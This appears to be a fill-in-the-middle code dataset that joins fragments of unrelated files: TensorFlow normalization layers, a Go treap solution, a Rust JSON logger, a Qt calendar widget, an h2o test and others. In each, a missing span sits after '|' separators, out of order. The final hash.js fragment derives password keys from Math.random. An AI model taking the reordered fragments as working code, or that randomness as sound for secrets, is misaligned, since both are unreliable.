examples = generate_examples(windows, nb_append=cfg.COUNT_WINDOWS_TRAIN,
nb_skip=cfg.COUNT_WINDOWS_TEST, verbose=True)
for feature_values_lists, labels in examples:
trainer.append(feature_values_lists, labels)
# Train the model
# this may take several hours
print("Training...")
if cfg.MAX_ITERATIONS is not None and cfg.MAX_ITERATIONS > 0:
        # set the maximum number of iterations if defined in the config file
# the optimizer stops automatically after some iterations if this is not set
trainer.set_params({'max_iterations': cfg.MAX_ITERATIONS})
trainer.train(args.identifier)
# ----------------
if __name__ == "__main__":
main() | We only load windows that contain at least one label (named entity), so that we don't
waste too much time on windows without any label.
4. Generate features for each chain of tokens (window). That's basically described in (2.).
Each chain of tokens from a window will be converted to a list of lists. |
normalizations.py | # Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Original implementation from keras_contrib/layer/normalization
# =============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import logging
import tensorflow as tf
@tf.keras.utils.register_keras_serializable(package='Addons')
class GroupNormalization(tf.keras.layers.Layer):
"""Group normalization layer.
Group Normalization divides the channels into groups and computes
within each group the mean and variance for normalization.
Empirically, its accuracy is more stable than batch norm in a wide
range of small batch sizes, if learning rate is adjusted linearly
with batch sizes.
Relation to Layer Normalization:
If the number of groups is set to 1, then this operation becomes identical
to Layer Normalization.
Relation to Instance Normalization:
If the number of groups is set to the
input dimension (number of groups is equal
to number of channels), then this operation becomes
identical to Instance Normalization.
Arguments
groups: Integer, the number of groups for Group Normalization.
Can be in the range [1, N] where N is the input dimension.
The input dimension must be divisible by the number of groups.
axis: Integer, the axis that should be normalized.
epsilon: Small float added to variance to avoid dividing by zero.
center: If True, add offset of `beta` to normalized tensor.
If False, `beta` is ignored.
scale: If True, multiply by `gamma`.
If False, `gamma` is not used.
beta_initializer: Initializer for the beta weight.
gamma_initializer: Initializer for the gamma weight.
beta_regularizer: Optional regularizer for the beta weight.
gamma_regularizer: Optional regularizer for the gamma weight.
beta_constraint: Optional constraint for the beta weight.
gamma_constraint: Optional constraint for the gamma weight.
Input shape
Arbitrary. Use the keyword argument `input_shape`
(tuple of integers, does not include the samples axis)
when using this layer as the first layer in a model.
Output shape
Same shape as input.
References
- [Group Normalization](https://arxiv.org/abs/1803.08494)
"""
def __init__(self,
groups=2,
axis=-1,
epsilon=1e-3,
center=True,
scale=True,
beta_initializer='zeros',
gamma_initializer='ones',
beta_regularizer=None,
gamma_regularizer=None,
beta_constraint=None,
gamma_constraint=None,
**kwargs):
super(GroupNormalization, self).__init__(**kwargs)
self.supports_masking = True
self.groups = groups
self.axis = axis
self.epsilon = epsilon
self.center = center
self.scale = scale
self.beta_initializer = tf.keras.initializers.get(beta_initializer)
self.gamma_initializer = tf.keras.initializers.get(gamma_initializer)
self.beta_regularizer = tf.keras.regularizers.get(beta_regularizer)
self.gamma_regularizer = tf.keras.regularizers.get(gamma_regularizer)
self.beta_constraint = tf.keras.constraints.get(beta_constraint)
self.gamma_constraint = tf.keras.constraints.get(gamma_constraint)
self._check_axis()
def build(self, input_shape):
self._check_if_input_shape_is_none(input_shape)
self._set_number_of_groups_for_instance_norm(input_shape)
self._check_size_of_dimensions(input_shape)
self._create_input_spec(input_shape)
self._add_gamma_weight(input_shape)
self._add_beta_weight(input_shape)
self.built = True
super(GroupNormalization, self).build(input_shape)
def call(self, inputs):
input_shape = tf.keras.backend.int_shape(inputs)
tensor_input_shape = tf.shape(inputs)
reshaped_inputs, group_shape = self._reshape_into_groups(
inputs, input_shape, tensor_input_shape)
normalized_inputs = self._apply_normalization(reshaped_inputs,
input_shape)
outputs = tf.reshape(normalized_inputs, tensor_input_shape)
return outputs
def get_config(self):
config = {
'groups':
self.groups,
'axis':
self.axis,
'epsilon':
self.epsilon,
'center':
self.center,
'scale':
self.scale,
'beta_initializer':
tf.keras.initializers.serialize(self.beta_initializer),
'gamma_initializer':
tf.keras.initializers.serialize(self.gamma_initializer),
'beta_regularizer':
tf.keras.regularizers.serialize(self.beta_regularizer),
'gamma_regularizer':
tf.keras.regularizers.serialize(self.gamma_regularizer),
'beta_constraint':
tf.keras.constraints.serialize(self.beta_constraint),
'gamma_constraint':
tf.keras.constraints.serialize(self.gamma_constraint)
}
base_config = super(GroupNormalization, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
def compute_output_shape(self, input_shape):
return input_shape
def _reshape_into_groups(self, inputs, input_shape, tensor_input_shape):
group_shape = [tensor_input_shape[i] for i in range(len(input_shape))]
group_shape[self.axis] = input_shape[self.axis] // self.groups
group_shape.insert(1, self.groups)
group_shape = tf.stack(group_shape)
reshaped_inputs = tf.reshape(inputs, group_shape)
return reshaped_inputs, group_shape
def _apply_normalization(self, reshaped_inputs, input_shape):
group_shape = tf.keras.backend.int_shape(reshaped_inputs)
group_reduction_axes = list(range(len(group_shape)))
# Remember the ordering of the tensor is [batch, group , steps]. Jump
# the first 2 to calculate the variance and the mean
mean, variance = tf.nn.moments(
reshaped_inputs, group_reduction_axes[2:], keepdims=True)
gamma, beta = self._get_reshaped_weights(input_shape)
normalized_inputs = tf.nn.batch_normalization(
reshaped_inputs,
mean=mean,
variance=variance,
scale=gamma,
offset=beta,
variance_epsilon=self.epsilon)
return normalized_inputs
def _get_reshaped_weights(self, input_shape):
broadcast_shape = self._create_broadcast_shape(input_shape)
gamma = None
beta = None
if self.scale:
gamma = tf.reshape(self.gamma, broadcast_shape)
if self.center:
beta = tf.reshape(self.beta, broadcast_shape)
return gamma, beta
def _check_if_input_shape_is_none(self, input_shape):
dim = input_shape[self.axis]
if dim is None:
raise ValueError('Axis ' + str(self.axis) + ' of '
'input tensor should have a defined dimension '
'but the layer received an input with shape ' +
str(input_shape) + '.')
def _set_number_of_groups_for_instance_norm(self, input_shape):
dim = input_shape[self.axis]
if self.groups == -1:
self.groups = dim
def _check_size_of_dimensions(self, input_shape):
dim = input_shape[self.axis]
if dim < self.groups:
|
if dim % self.groups != 0:
raise ValueError(
'Number of groups (' + str(self.groups) + ') must be a '
'multiple of the number of channels (' + str(dim) + ').')
def _check_axis(self):
if self.axis == 0:
raise ValueError(
"You are trying to normalize your batch axis. Do you want to "
"use tf.layer.batch_normalization instead")
def _create_input_spec(self, input_shape):
dim = input_shape[self.axis]
self.input_spec = tf.keras.layers.InputSpec(
ndim=len(input_shape), axes={self.axis: dim})
def _add_gamma_weight(self, input_shape):
dim = input_shape[self.axis]
shape = (dim,)
if self.scale:
self.gamma = self.add_weight(
shape=shape,
name='gamma',
initializer=self.gamma_initializer,
regularizer=self.gamma_regularizer,
constraint=self.gamma_constraint)
else:
self.gamma = None
def _add_beta_weight(self, input_shape):
dim = input_shape[self.axis]
shape = (dim,)
if self.center:
self.beta = self.add_weight(
shape=shape,
name='beta',
initializer=self.beta_initializer,
regularizer=self.beta_regularizer,
constraint=self.beta_constraint)
else:
self.beta = None
def _create_broadcast_shape(self, input_shape):
broadcast_shape = [1] * len(input_shape)
broadcast_shape[self.axis] = input_shape[self.axis] // self.groups
broadcast_shape.insert(1, self.groups)
return broadcast_shape
@tf.keras.utils.register_keras_serializable(package='Addons')
class InstanceNormalization(GroupNormalization):
"""Instance normalization layer.
    Instance Normalization is a specific case of ```GroupNormalization``` since
    it normalizes all features of one channel. The group size is equal to the
channel size. Empirically, its accuracy is more stable than batch norm in a
wide range of small batch sizes, if learning rate is adjusted linearly
with batch sizes.
Arguments
axis: Integer, the axis that should be normalized.
epsilon: Small float added to variance to avoid dividing by zero.
center: If True, add offset of `beta` to normalized tensor.
If False, `beta` is ignored.
scale: If True, multiply by `gamma`.
If False, `gamma` is not used.
beta_initializer: Initializer for the beta weight.
gamma_initializer: Initializer for the gamma weight.
beta_regularizer: Optional regularizer for the beta weight.
gamma_regularizer: Optional regularizer for the gamma weight.
beta_constraint: Optional constraint for the beta weight.
gamma_constraint: Optional constraint for the gamma weight.
Input shape
Arbitrary. Use the keyword argument `input_shape`
(tuple of integers, does not include the samples axis)
when using this layer as the first layer in a model.
Output shape
Same shape as input.
References
- [Instance Normalization: The Missing Ingredient for Fast Stylization]
(https://arxiv.org/abs/1607.08022)
"""
def __init__(self, **kwargs):
if "groups" in kwargs:
logging.warning("The given value for groups will be overwritten.")
kwargs["groups"] = -1
super(InstanceNormalization, self).__init__(**kwargs)
| raise ValueError(
'Number of groups (' + str(self.groups) + ') cannot be '
'more than the number of channels (' + str(dim) + ').') |
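# A minimal usage sketch (assumes this module is importable; shapes are examples):
#
#   import tensorflow as tf
#   x = tf.random.normal([8, 32, 32, 16])
#   y = GroupNormalization(groups=4, axis=-1)(x)   # normalize within 4 channel groups
#   z = InstanceNormalization(axis=-1)(x)          # groups == number of channels
#   assert y.shape == x.shape == z.shape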
960F.go | package main
import (
"bufio"
. "fmt"
"io"
"time"
)
// github.com/EndlessCheng/codeforces-go
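// node60 is a treap node keyed on edge weight. cmp returns which child to
// descend into (0 = left, 1 = right) or -1 on an exact key match; rotate(d)
// restores the heap property on priority after an insertion.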
type node60 struct {
lr [2]*node60
priority uint
key, val int
}
func (o *node60) cmp(b int) int {
switch {
case b < o.key:
return 0
case b > o.key:
return 1
default:
return -1
}
}
func (o *node60) rotate(d int) *node60 {
x := o.lr[d^1]
o.lr[d^1] = x.lr[d]
x.lr[d] = o
return x
}
type treap60 struct {
rd uint
root *node60
}
func (t *treap60) fastRand() uint {
t.rd ^= t.rd << 13
t.rd ^= t.rd >> 17
t.rd ^= t.rd << 5
return t.rd
}
func (t *treap60) _put(o *node60, key, val int) *node60 {
if o == nil |
if d := o.cmp(key); d >= 0 {
o.lr[d] = t._put(o.lr[d], key, val)
if o.lr[d].priority > o.priority {
o = o.rotate(d ^ 1)
}
}
return o
}
func (t *treap60) put(key, val int) { t.root = t._put(t.root, key, val) }
func (t *treap60) _delete(o *node60, key int) *node60 {
if o == nil {
return nil
}
if d := o.cmp(key); d >= 0 {
o.lr[d] = t._delete(o.lr[d], key)
} else {
if o.lr[1] == nil {
return o.lr[0]
}
if o.lr[0] == nil {
return o.lr[1]
}
d = 0
if o.lr[0].priority > o.lr[1].priority {
d = 1
}
o = o.rotate(d)
o.lr[d] = t._delete(o.lr[d], key)
}
return o
}
func (t *treap60) delete(key int) { t.root = t._delete(t.root, key) }
func (t *treap60) lowerBound(key int) (lb *node60) {
for o := t.root; o != nil; {
switch c := o.cmp(key); {
case c == 0:
lb = o
o = o.lr[0]
case c > 0:
o = o.lr[1]
default:
return o
}
}
return
}
func (t *treap60) prev(key int) (prev *node60) {
for o := t.root; o != nil; {
if o.cmp(key) <= 0 {
o = o.lr[0]
} else {
prev = o
o = o.lr[1]
}
}
return
}
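// CF960F solves Codeforces 960F: the longest path whose edges appear in input
// order with strictly increasing weights. ts[v] is a treap per vertex mapping
// weight -> best path length ending at v, pruned so it stays a Pareto front.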
func CF960F(_r io.Reader, out io.Writer) {
in := bufio.NewReader(_r)
var n, m, v, w, wt, ans int
Fscan(in, &n, &m)
ts := make([]*treap60, n)
rd := uint(time.Now().UnixNano())/2 + 1
for i := range ts {
ts[i] = &treap60{rd: rd}
}
for ; m > 0; m-- {
Fscan(in, &v, &w, &wt)
v--
w--
res := 1
if o := ts[v].prev(wt + 1); o != nil {
res = o.val + 1
}
if res > ans {
ans = res
}
for {
o := ts[w].lowerBound(wt)
if o == nil || o.val > res {
break
}
ts[w].delete(o.key)
}
if o := ts[w].lowerBound(wt); o != nil && o.key == wt {
continue
}
if o := ts[w].prev(wt); o != nil && o.val >= res {
continue
}
ts[w].put(wt, res)
}
Fprint(out, ans)
}
//func main() { CF960F(os.Stdin, os.Stdout) }
| {
return &node60{priority: t.fastRand(), key: key, val: val}
} |
acosh.go | // Copyright 2010 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
package math
// The original C code, the long comment, and the constants
// below are from FreeBSD's /usr/src/lib/msun/src/e_acosh.c
// and came with this notice. The go code is a simplified
// version of the original C.
//
// ====================================================
// Copyright (C) 1993 by Sun Microsystems, Inc. All rights reserved.
//
// Developed at SunPro, a Sun Microsystems, Inc. business.
// Permission to use, copy, modify, and distribute this
// software is freely granted, provided that this notice
// is preserved.
// ====================================================
//
//
// __ieee754_acosh(x)
// Method :
// Based on
// acosh(x) = log [ x + sqrt(x*x-1) ]
// we have
// acosh(x) := log(x)+ln2, if x is large; else
// acosh(x) := log(2x-1/(sqrt(x*x-1)+x)) if x>2; else
// acosh(x) := log1p(t+sqrt(2.0*t+t*t)); where t=x-1.
//
// Special cases:
// acosh(x) is NaN with signal if x<1.
// acosh(NaN) is NaN without signal.
//
// Acosh returns the inverse hyperbolic cosine of x.
//
// Special cases are:
// Acosh(+Inf) = +Inf
// Acosh(x) = NaN if x < 1
// Acosh(NaN) = NaN
func Acosh(x float64) float64 |
func acosh(x float64) float64 {
const Large = 1 << 28 // 2**28
// first case is special case
switch {
case x < 1 || IsNaN(x):
return NaN()
case x == 1:
return 0
case x >= Large:
return Log(x) + Ln2 // x > 2**28
case x > 2:
return Log(2*x - 1/(x+Sqrt(x*x-1))) // 2**28 > x > 2
}
t := x - 1
return Log1p(t + Sqrt(2*t+t*t)) // 2 >= x > 1
}
| {
if haveArchAcosh {
return archAcosh(x)
}
return acosh(x)
} |
precharge_array.py | import design
import debug |
class precharge_array(design.design):
"""
Dynamically generated precharge array of all bitlines. Cols is number
of bit line columns, height is the height of the bit-cell array.
"""
def __init__(self, columns, size=1):
design.design.__init__(self, "precharge_array")
debug.info(1, "Creating {0}".format(self.name))
self.columns = columns
self.pc_cell = precharge(name="precharge", size=size)
self.add_mod(self.pc_cell)
self.width = self.columns * self.pc_cell.width
self.height = self.pc_cell.height
self.add_pins()
self.create_layout()
self.DRC_LVS()
def add_pins(self):
"""Adds pins for spice file"""
for i in range(self.columns):
self.add_pin("bl[{0}]".format(i))
self.add_pin("br[{0}]".format(i))
self.add_pin("en")
self.add_pin("vdd")
def create_layout(self):
self.add_insts()
self.add_layout_pin(text="vdd",
layer="metal1",
offset=self.pc_cell.get_pin("vdd").ll(),
width=self.width,
height=drc["minwidth_metal1"])
self.add_layout_pin(text="en",
layer="metal1",
offset=self.pc_cell.get_pin("en").ll(),
width=self.width,
height=drc["minwidth_metal1"])
def add_insts(self):
"""Creates a precharge array by horizontally tiling the precharge cell"""
for i in range(self.columns):
name = "pre_column_{0}".format(i)
offset = vector(self.pc_cell.width * i, 0)
inst=self.add_inst(name=name,
mod=self.pc_cell,
offset=offset)
bl_pin = inst.get_pin("bl")
self.add_layout_pin(text="bl[{0}]".format(i),
layer="metal2",
offset=bl_pin.ll(),
width=drc["minwidth_metal2"],
height=bl_pin.height())
br_pin = inst.get_pin("br")
self.add_layout_pin(text="br[{0}]".format(i),
layer="metal2",
offset=br_pin.ll(),
width=drc["minwidth_metal2"],
height=bl_pin.height())
self.connect_inst(["bl[{0}]".format(i), "br[{0}]".format(i),
"en", "vdd"]) | from tech import drc
from vector import vector
from precharge import precharge |
lib.rs | //! `json_env_logger` is an extension of [`env_logger`](https://crates.io/crates/env_logger) crate providing JSON formatted logs.
//!
//! The [`env_logger`](https://crates.io/crates/env_logger) is a crate that provides a way to declare what log levels are enabled for which modules via a `RUST_LOG` env variable. See its documentation for
//! syntax of declaring crate and module filtering options.
//!
//! ## features
//!
//! * `iso-timestamps`
//!
//! By default, a timestamp field called `ts` is emitted with the current Unix epoch timestamp in milliseconds.
//! You can replace this with ISO-8601 timestamps by enabling the `iso-timestamps` feature. Note that this adds the `chrono` crate
//! to your dependency tree.
//!
//! ```toml
//! [dependencies]
//! json_env_logger = { version = "0.1", features = ["iso-timestamps"] }
//! ```
//! * `backtrace`
//!
//! When registering a panic hook with `panic_hook`, backtraces are omitted by default. You can
//! annotate your errors with them by enabling the `backtrace` feature.
//!
//! ```toml
//! [dependencies]
//! json_env_logger = { version = "0.1", features = ["backtrace"] }
//! ```
// export to make types accessible without
// requiring adding another Cargo.toml dependency
#[doc(hidden)]
pub extern crate env_logger;
use env_logger::Builder;
use log::kv;
use std::{
io::{self, Write},
panic, thread,
};
/// Register configured json env logger implementation with `log` crate.
///
/// Applications should ensure this fn gets called once and only once per application
/// lifetime
///
/// # panics
///
/// Panics if logger has already been configured
pub fn init() {
try_init().unwrap()
}
/// Register configured json env logger with `log` crate
///
/// Will yield a `log::SetLoggerError` when a logger has already
/// been configured
pub fn try_init() -> Result<(), log::SetLoggerError> {
builder().try_init()
}
/// Register a panic hook that serializes panic information as json
/// and logs via `log::error`
pub fn panic_hook() {
panic::set_hook(Box::new(|info| {
let thread = thread::current();
let thread = thread.name().unwrap_or("unnamed");
let msg = match info.payload().downcast_ref::<&'static str>() {
Some(s) => *s,
None => match info.payload().downcast_ref::<String>() {
Some(s) => &**s,
None => "Box<Any>",
},
};
match info.location() {
Some(location) => {
#[cfg(not(feature = "backtrace"))]
{
kv_log_macro::error!(
"panicked at '{}'", msg,
{
thread: thread,
location: format!("{}:{}", location.file(), location.line())
}
);
}
#[cfg(feature = "backtrace")]
{
kv_log_macro::error!(
"panicked at '{}'", msg,
{
thread: thread,
location: format!("{}:{}", location.file(), location.line()),
backtrace: format!("{:?}", backtrace::Backtrace::new())
}
);
}
}
None => {
#[cfg(not(feature = "backtrace"))]
{
kv_log_macro::error!("panicked at '{}'", msg, { thread: thread });
}
#[cfg(feature = "backtrace")]
{
kv_log_macro::error!(
"panicked at '{}'", msg,
{
thread: thread,
backtrace: format!("{:?}", backtrace::Backtrace::new())
}
);
}
}
}
}));
}
/// Yields the standard `env_logger::Builder` configured to log in JSON format
pub fn builder() -> Builder {
let mut builder = Builder::from_default_env();
builder.format(write);
builder
}
fn write<F>(
f: &mut F,
record: &log::Record,
) -> io::Result<()>
where
F: Write,
{
write!(f, "{{")?;
write!(f, "\"level\":\"{}\",", record.level())?;
#[cfg(feature = "iso-timestamps")]
{
write!(
f,
"\"ts\":\"{}\"",
chrono::Utc::now().to_rfc3339_opts(chrono::SecondsFormat::Millis, true)
)?;
}
#[cfg(not(feature = "iso-timestamps"))]
{
write!(
f,
"\"ts\":{}",
std::time::UNIX_EPOCH.elapsed().unwrap().as_millis()
)?;
}
write!(f, ",\"msg\":")?;
write_json_str(f, &record.args().to_string())?;
struct Visitor<'a, W: Write> {
writer: &'a mut W,
}
impl<'kvs, 'a, W: Write> kv::Visitor<'kvs> for Visitor<'a, W> {
fn visit_pair(
&mut self,
key: kv::Key<'kvs>,
val: kv::Value<'kvs>,
) -> Result<(), kv::Error> |
}
let mut visitor = Visitor { writer: f };
record.key_values().visit(&mut visitor).unwrap();
writeln!(f, "}}")
}
// until log kv Value impl serde::Serialize
fn write_json_str<W: io::Write>(
writer: &mut W,
raw: &str,
) -> std::io::Result<()> {
serde_json::to_writer(writer, raw)?;
Ok(())
}
#[cfg(test)]
mod tests {
use super::*;
use std::error::Error;
#[test]
fn writes_records_as_json() -> Result<(), Box<dyn Error>> {
let record = log::Record::builder()
.args(format_args!("hello"))
.level(log::Level::Info)
.build();
let mut buf = Vec::new();
write(&mut buf, &record)?;
let output = std::str::from_utf8(&buf)?;
assert!(serde_json::from_str::<serde_json::Value>(&output).is_ok());
Ok(())
}
#[test]
fn escapes_json_strings() -> Result<(), Box<dyn Error>> {
let mut buf = Vec::new();
write_json_str(
&mut buf, r#""
"#,
)?;
assert_eq!("\"\\\"\\n\\t\"", std::str::from_utf8(&buf)?);
Ok(())
}
}
| {
// This is REALLY hacky. Log values in quotes.
// This means bools log as "true" "false" (with quotes)
// and numbers also log inside quotes as strings.
// Every value is a string, but it is valid JSON.
write!(self.writer, ",\"{}\":\"{}\"", key, val).unwrap();
Ok(())
} |
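// A minimal usage sketch (hypothetical consumer crate; `RUST_LOG` selects levels):
//
//     fn main() {
//         json_env_logger::init();
//         json_env_logger::panic_hook();
//         kv_log_macro::info!("listening", { port: 8080 });
//         // -> {"level":"INFO","ts":...,"msg":"listening","port":"8080"}
//     }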
QNCalendarWidget.py | #@+leo-ver=5-thin
#@+node:ekr.20160519123329.1: * @file ../plugins/QNCalendarWidget.py
#@@language python
"""
QNCalendarWidget.py - a QCalendarWidget which shows N months at a time.
Not a full QCalendarWidget implementation, just enough to work
with a QDateEdit (QNDateEdit) in a particular context.
[email protected], Tue Oct 15 09:53:38 2013
"""
import sys
import datetime
from leo.core import leoGlobals as g
from leo.core.leoQt import isQt6, QtCore, QtWidgets
#
# Fail fast, right after all imports.
g.assertUi('qt') # May raise g.UiTypeException, caught by the plugins manager.
def init():
return True # For unit tests.
class QNCalendarWidget(QtWidgets.QCalendarWidget):
def __init__(self, n=3, columns=3, year=None, month=None):
"""set up
:Parameters:
- `self`: the widget
- `n`: number of months to display
- `columns`: months to display before start a new row
- `year`: year of first calendar
- `month`: month of first calendar
"""
super().__init__()
self.build(n, columns, year=year, month=month)
def build(self, n=3, columns=3, year=None, month=None):
self.calendars = []
if year is None:
year = datetime.date.today().year
if month is None:
month = datetime.date.today().month
layout = QtWidgets.QGridLayout()
while self.layout().count():
self.layout().removeItem(self.layout().itemAt(0))
self.layout().addLayout(layout)
size = self.minimumSizeHint()
x, y = size.width(), size.height()
x *= min(n, columns)
y *= 1 + ((n-1) // columns)
self.setMinimumSize(QtCore.QSize(x, y) )
for i in range(n):
calendar = QtWidgets.QCalendarWidget()
calendar.i = i
calendar.setCurrentPage(year, month)
month += 1
if month == 13:
year += 1
month = 1
calendar.currentPageChanged.connect(
lambda year, month, cal=calendar:
self.currentPageChanged(year, month, cal))
calendar.clicked.connect(self.return_result)
calendar.activated.connect(self.return_result)
self.calendars.append(calendar)
layout.addWidget(calendar, i//columns, i%columns)
def currentPageChanged(self, year, month, cal):
"""currentPageChanged - Handle change of view
:Parameters:
- `self`: self
- `year`: new year
- `month`: new month
- `cal`: which calendar
"""
for i in range(cal.i):
month -= 1
if month == 0:
|
for calendar in self.calendars:
calendar.setCurrentPage(year, month)
month += 1
if month == 13:
year += 1
month = 1
activated = QtCore.pyqtSignal(QtCore.QDate)
def return_result(self, date):
"""return_result - Return result
:Parameters:
- `self`: self
        - `date`: the date that was selected
"""
for i in self.calendars:
old = i.blockSignals(True) # stop currentPageChanged firing
y, m = i.yearShown(), i.monthShown()
i.setSelectedDate(date)
i.setCurrentPage(y, m)
i.blockSignals(old)
self.activated.emit(date)
class QNDateEdit(QtWidgets.QDateEdit):
def __init__(self, parent=None, n=3, columns=3):
"""set up
:Parameters:
- `self`: the widget
- `n`: number of months to display
- `columns`: months to display before start a new row
"""
super().__init__(parent)
self.setCalendarPopup(True)
self.cw = QNCalendarWidget(n=n, columns=columns)
self.setCalendarWidget(self.cw)
def main():
app = QtWidgets.QApplication(sys.argv)
win = QtWidgets.QWidget()
l = QtWidgets.QVBoxLayout()
win.setLayout(l)
w = QtWidgets.QDateEdit()
w.setCalendarPopup(True)
l.addWidget(w)
l.addWidget(QNDateEdit())
l.addWidget(QNDateEdit(n=6))
l.addWidget(QNDateEdit(n=1))
l.addWidget(QNDateEdit(n=2))
l.addWidget(QNDateEdit(n=6, columns=2))
l.addWidget(QNDateEdit(n=6, columns=4))
l.addWidget(QNDateEdit(n=12, columns=4))
l.addWidget(QNDateEdit(columns=1))
last = QNDateEdit()
l.addWidget(last)
last.calendarWidget().build(5,4)
win.show()
if isQt6:
sys.exit(app.exec())
else:
sys.exit(app.exec_())
if __name__ == '__main__':
main()
#@-leo
| year -= 1
month = 12 |
format.rs | #[doc = "Reader of register FORMAT"]
pub type R = crate::R<u32, super::FORMAT>;
#[doc = "Writer for register FORMAT"]
pub type W = crate::W<u32, super::FORMAT>;
#[doc = "Register FORMAT `reset()`'s with value 0"]
impl crate::ResetValue for super::FORMAT {
type Type = u32;
#[inline(always)]
fn reset_value() -> Self::Type {
0
}
}
#[doc = "Frame format.\n\nValue on reset: 0"]
#[derive(Clone, Copy, Debug, PartialEq)]
pub enum FORMAT_A {
#[doc = "0: Original I2S format."]
I2S = 0,
#[doc = "1: Alternate (left- or right-aligned) format."]
ALIGNED = 1,
}
impl From<FORMAT_A> for bool {
#[inline(always)]
fn from(variant: FORMAT_A) -> Self {
variant as u8 != 0
}
}
#[doc = "Reader of field `FORMAT`"]
pub type FORMAT_R = crate::R<bool, FORMAT_A>;
impl FORMAT_R {
#[doc = r"Get enumerated values variant"]
#[inline(always)]
pub fn variant(&self) -> FORMAT_A {
match self.bits {
false => FORMAT_A::I2S,
true => FORMAT_A::ALIGNED,
}
}
#[doc = "Checks if the value of the field is `I2S`"]
#[inline(always)]
pub fn is_i2s(&self) -> bool {
*self == FORMAT_A::I2S
}
#[doc = "Checks if the value of the field is `ALIGNED`"]
#[inline(always)]
pub fn is_aligned(&self) -> bool {
*self == FORMAT_A::ALIGNED
}
}
#[doc = "Write proxy for field `FORMAT`"]
pub struct FORMAT_W<'a> {
w: &'a mut W,
}
impl<'a> FORMAT_W<'a> {
#[doc = r"Writes `variant` to the field"]
#[inline(always)]
pub fn variant(self, variant: FORMAT_A) -> &'a mut W {
{
self.bit(variant.into())
}
}
#[doc = "Original I2S format."]
#[inline(always)]
pub fn i2s(self) -> &'a mut W {
self.variant(FORMAT_A::I2S)
}
#[doc = "Alternate (left- or right-aligned) format."]
#[inline(always)]
pub fn aligned(self) -> &'a mut W {
self.variant(FORMAT_A::ALIGNED)
}
#[doc = r"Sets the field bit"]
#[inline(always)]
pub fn set_bit(self) -> &'a mut W {
self.bit(true)
} | pub fn clear_bit(self) -> &'a mut W {
self.bit(false)
}
#[doc = r"Writes raw bits to the field"]
#[inline(always)]
pub fn bit(self, value: bool) -> &'a mut W {
self.w.bits = (self.w.bits & !0x01) | ((value as u32) & 0x01);
self.w
}
}
impl R {
#[doc = "Bit 0 - Frame format."]
#[inline(always)]
pub fn format(&self) -> FORMAT_R {
FORMAT_R::new((self.bits & 0x01) != 0)
}
}
impl W {
#[doc = "Bit 0 - Frame format."]
#[inline(always)]
pub fn format(&mut self) -> FORMAT_W {
FORMAT_W { w: self }
}
} | #[doc = r"Clears the field bit"]
#[inline(always)] |
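// A minimal usage sketch (assumes a peripheral handle `i2s` exposing this register):
//
//     i2s.format.write(|w| w.format().aligned());
//     let original = i2s.format.read().format().is_i2s();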
pyunit_NOPASS_hex_1897_glm_offset.py | import sys
sys.path.insert(1, "../../")
import h2o
def | (ip, port):
h2o.init(ip, port)
print 'Checking binomial models for GLM with and without offset'
print 'Import prostate dataset into H2O and R...'
prostate_hex = h2o.import_frame(h2o.locate("smalldata/prostate/prostate.csv"))
print "Checking binomial model without offset..."
prostate_glm_h2o = h2o.glm(x=prostate_hex["RACE", "DPROS", "DCAPS", "PSA", "VOL", "GLEASON"],
y=prostate_hex["CAPSULE"], training_frame=prostate_hex, family="binomial", standardize=False)
print "h2o residual: {0}".format(prostate_glm_h2o.residual_deviance())
print "r residual: {0}".format(379.053509501537)
assert abs(379.053509501537 - prostate_glm_h2o.residual_deviance()) < 0.1
print "Checking binomial model with offset..."
prostate_glm_h2o = h2o.glm(x=prostate_hex["RACE", "DPROS", "DCAPS", "PSA", "VOL", "GLEASON", "AGE"],
y=prostate_hex["CAPSULE"], training_frame=prostate_hex, family="binomial",
offset_column = "AGE", standardize = False)
print "h2o residual: {0}".format(prostate_glm_h2o.residual_deviance())
print "r residual: {0}".format(1515.91815848623)
assert abs(1515.91815848623 - prostate_glm_h2o.residual_deviance()) < 0.1
print "Checking binomial model without offset..."
prostate_glm_h2o = h2o.glm(x=prostate_hex["RACE", "DPROS", "DCAPS", "PSA", "VOL", "GLEASON"],
y=prostate_hex["CAPSULE"], training_frame=prostate_hex, family="poisson", standardize=False)
print "h2o residual: {0}".format(prostate_glm_h2o.residual_deviance())
print "r residual: {0}".format(216.339989007507)
assert abs(216.339989007507 - prostate_glm_h2o.residual_deviance()) < 0.1
print "Checking binomial model with offset..."
prostate_glm_h2o = h2o.glm(x=prostate_hex["RACE", "DPROS", "DCAPS", "PSA", "VOL", "GLEASON", "AGE"],
y=prostate_hex["CAPSULE"], training_frame=prostate_hex, family="poisson",
offset_column = "AGE", standardize = False)
print "h2o residual: {0}".format(prostate_glm_h2o.residual_deviance())
print "r residual: {0}".format(2761.76218461138)
assert abs(2761.76218461138 - prostate_glm_h2o.residual_deviance()) < 0.1
if __name__ == "__main__":
h2o.run_test(sys.argv, offset_1897)
| offset_1897 |
hash.js | var rans = [], tkeeper = [];
var i = 0, k = 0, j = 0;
var $uid, $psk, psw, rpsw;
// Shared random helper used by RK, TK, trand and Passphrase below.
let didcx_random_number_generator = function(min, max){
    return Math.floor(Math.random() * (max - min)) + min;
}
function | ($email, $password, $repeatPassword){
if($email == ""){
return -1;
}
if($password == ""){
return -2;
}
if($repeatPassword == ""){
return -3;
}
rans[i] = didcx_random_number_generator(0, 2288282819191911);
if(rans.length == 1000){
Passphrase($password, $repeatPassword);
//TK($password, $repeatPassword);
return;
}
else{
i++;
return RK($email, $password, $repeatPassword);
}
}
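// RK recursively accumulates 1000 random values in `rans`, then hands off to
// Passphrase, which later picks an odd entry as the per-password shift `sk`.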
var riv;
function trand(tc, ts = 0, tkeeper = []){
ts = didcx_random_number_generator(0, tkeeper.length-1);
ts = tkeeper[ts];
if(tc < ts){
return trand(tc, ts, tkeeper);
}
return riv = ts;
}
var dd = 0;
var tc;
async function sleepMode2($password, $repeatPassword, sleep_time = 121000, sleep_caller = null){
